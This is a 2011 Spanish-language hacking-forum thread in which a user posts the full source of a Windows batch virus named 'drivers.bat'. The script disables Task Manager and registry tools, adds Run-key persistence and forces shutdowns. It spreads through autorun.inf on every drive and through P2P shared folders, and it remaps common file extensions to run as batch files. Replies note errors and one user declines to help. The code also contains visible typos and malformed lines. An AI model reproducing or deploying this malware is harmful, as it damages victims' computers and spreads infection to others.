elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  virus drivers.bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: virus drivers.bat  (Leído 2,802 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
virus drivers.bat
« en: 2 Junio 2011, 18:07 pm »

 tu amigo W4rR3d

Código
  1. @echo off
  2. @Set mr=%homedrive%
  3. @Set rsm=%systemroot%
  4. @Set rms=echo
  5. @set kmbfo=copy
  6. TASKKILL /IM explorer.exe/F  IM msnmsgr.exe /F
  7. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v drivers /t REG_SZ /d "%systemroot%\System32\drivers.bat" /f
  8. REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
  9. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  10. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  11. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  12. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  13. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://4.bp.blogspot.com/_04D_IYYf9WA/TTDJzjOv_XI/AAAAAAAAAK4/Gmh_VUM8mJA/s1600/virus.jpg"
  14. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  15. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  16. if exist %%E:\drivers.bat goto rm
  17. for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  18. copy /Y %0 %%E:\drivers.bat
  19. echo.[AutoRun]>> %%E:\autorun.inf
  20. echo.open="%%E:\drivers.bat">> %%E:\autorun.inf
  21. echo.action=Open folder to see files...>> %%E:\autorun.inf
  22. attrib +h +s +r %%E:\autorun.inf
  23. attrib +h +s +r %%E:\drivers.bat
  24. :rm
  25. if exist %mr%\abrir.vbs goto bir
  26. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> %mr%\abrir.vbs
  27. echo Set colCDROMs = oWMP.cdromCollection >> %mr%\abrir.vbs
  28. echo. >> %mr%\abrir.vbs
  29. echo if colCDROMs.Count >= 1 then >> %mr%\abrir.vbs
  30. echo For i = 0 to colCDROMs.Count - 1 >> %mr%\abrir.vbs
  31. echo colCDROMs.Item(i).Eject >> %mr%\abrir.vbs
  32. echo Next ' cdrom >> %mr%\abrir.vbs
  33. echo End If >> %mr%\abrir.vbs
  34. start %mr%\abrir.vbs
  35. :bir
  36. if exist  %mr%\apagon.vbs goto ir
  37. %rms% On Error Resume Next >> %mr%\apagon.vbs
  38. %rms% set shell = CreateObject("WScript.Shell") >> %mr%\apagon.vbs
  39. %rms% shell.run "shutdown.exe -s -f -t 10 " >> %mr%\apagon.vbs
  40. start %mr%\apagon.vbs
  41. :ir
  42. if exist %rsm%\system32\drivers.bat goto wi
  43. copy %0 %rsm%\system32\drivers.bat
  44. echo On Error Resume next >> "%rsm%\system32\drivers.vbs"
  45. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%rsm%\system32\drivers.vbs"
  46. echo oShell.Run "%rsm%\system32\drivers.bat",0 >> start "%rsm%\system32\drivers.vbs"
  47. :wi
  48. if exist %windir%\drivers.bat goto sys
  49. copy %0 %windir%\drivers.bat
  50. echo On Error Resume next >> "%windir%\drivers.vbs"
  51. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%windir%\drivers.vbs"
  52. echo oShell.Run "%windir%\drivers.bat",0 >> start "%windir%\drivers.vbs"
  53. :sys
  54. if exist %homedrive%\drivers.bat goto p2p
  55. copy %0 %homedrive%\drivers.bat
  56. echo On Error Resume next >> "%homedrive%\drivers.vbs"
  57. echo Set oShell = WScript.CreateObject ("WSCript.shell") >>"%homedrive%\drivers.vbs"
  58. echo oShell.Run "%homedrive%\drivers.bat",0 >> start "%homedrive%\drivers.vbs"
  59. for %%e in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink) do assoc .%%e=batfile
  60. %rms% set ff=createobject("scripting.filesystemobject")>>bicho.vbs
  61. %rms% set rr=ff.opentextfile(%0,1)>>bicho.vbs
  62. %rms% aa = rr.readall>>bicho.vbs
  63. %rms%% rr.close>>bicho.vbs
  64. %rms% Randomize>>bicho.vbs
  65. %rms% bicho = int(rnd * 3)>>bicho.vbs
  66. %rms% if bicho = 0 or bicho = 2 then>>bicho.vbs
  67. %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs
  68. %rms% rand1 = Replace(aa,"rms","rms" ^& s ^& bicho)>>bicho.vbs
  69. %rms% rand2 = Replace(rand1,"kmbfo","kmbfo" ^& s ^& s ^& bicho)>>bicho.vbs
  70. %rms% else>>bicho.vbs
  71. %rms% bichonum = int(rnd * 7)>>bicho.vbs
  72. %rms% for i = 1 to bichonum>>bicho.vbs
  73. %rms% bichochar = chr(int(22 * rnd) + 97)>>bicho.vbs
  74. %rms% bichoall = bichoyall + bichochar>>bicho.vbs
  75. %rms% next>>bicho.vbs
  76. %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs
  77. %rms% rand1 = Replace(aa,"rms",bichoall )>>bicho.vbs
  78. %rms% rand2 = Replace(rand1,"kmbfo", s ^& bichoall)>>bicho.vbs
  79. %rms% end if>>bicho.vbs
  80. %rms%% set bb=ff.opentextfile(%0,2)>>bicho.vbs
  81. %rms% bb.write rand2>>bicho.vbs
  82. :p2p
  83. if exist %Programfiles%\drivers.bat goto @exit
  84. Set prom =%Programfiles%
  85. Set pro=drivers.bat
  86. copy /y "%prom%\Grokster\My Grokster\%pro%"
  87. copy /y "%prom%\Morpheus\My Shared Folder\%pro%"
  88. copy /y "%prom%\ICQ\shared files\%pro%"
  89. copy /y "%prom%\KaZaA\My Shared Folder\%pro%"
  90. copy /y "%prom%\KaZaA Lite\My Shared Folder\%pro%"
  91. copy /y "%prom%\EDONKEY2000\incoming\%pro%"
  92. copy /y "%prom%\eMule\Incoming\%pro%"
  93. copy /y "%prom%\Filetopia3\Files\%pro%"
  94. copy /y "%prom%\appleJuice\incoming\%pro%"
  95. copy /y "%prom%\Gnucleus\Downloads\%pro%"
  96. copy /y "%prom%\LimeWire\Shared\%pro%"
  97. copy /y "%prom%\Overnet\incoming\%pro%"
  98. copy /y "%prom%\Shareaza\Downloads\%pro%"
  99. copy /y "%prom%\Swaptor\Download\%pro%"
  100. copy /y "%prom%\WinMX\My Shared Folder\%pro%"
  101. copy /y "%prom%\Tesla\Files\%pro%"
  102. copy /y "%prom%\XoloX\Downloads\%pro%"
  103. copy /y "%prom%\Rapigator\Share\%pro%"
  104. copy /y "%prom%\KMD\My Shared Folder\%pro%"
  105. copy /y "%prom%\BearShare\Shared\%pro%"
  106. copy /y "%prom%\Direct Connect\Received Files\%pro%"
  107. @cscript bicho.vbs
  108. @del bicho.vbs
  109.  


« Última modificación: 3 Junio 2011, 17:04 pm por W4rR3d » En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus drivers.bat
« Respuesta #1 en: 2 Junio 2011, 20:23 pm »

Código:
for %a in (*.png,*.jpg,*.gif,,*.mp3,*.mp4,*.avi,*.mpg,*.flv, *.mov,*.doc,*.docx,*.xls,*.xlsx) do (copy /y %0 %%a > nul) 



veo muchos errores en tu script, uno grande es ese.

No te doy más pistas porque no me gusta el tema.

Deberias probarlo contigo mismo porque la mayoria de cosas no te van a funcionar.



En línea

No he vuelto, solo estoy de paso.
FranciskoAsdf

Desconectado Desconectado

Mensajes: 231


Ni bueno, ni malo. Solo nada.


Ver Perfil WWW
Re: virus drivers.bat
« Respuesta #2 en: 3 Junio 2011, 01:32 am »

Hay varias cosas que no van a funcionar :P

Por ultimo móntate una maquina virtual y lo pruebas, pero asi veo que no :P
En línea

Asdf debería ser algún tipo de función.
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: virus drivers.bat
« Respuesta #3 en: 3 Junio 2011, 03:52 am »

@W4rR3d

A ver, ¿en qué es distinto esto a los 300 códigos de virus que salen semanalmente?
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Puede un crypter joderte los drivers del mouse?
Windows
scott_ 5 3,460 Último mensaje 30 Abril 2015, 07:36 am
por scott_
Los drivers de tu PC con Windows 10 son un coladero de virus
Noticias
wolfbcn 0 1,174 Último mensaje 12 Agosto 2019, 23:20 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines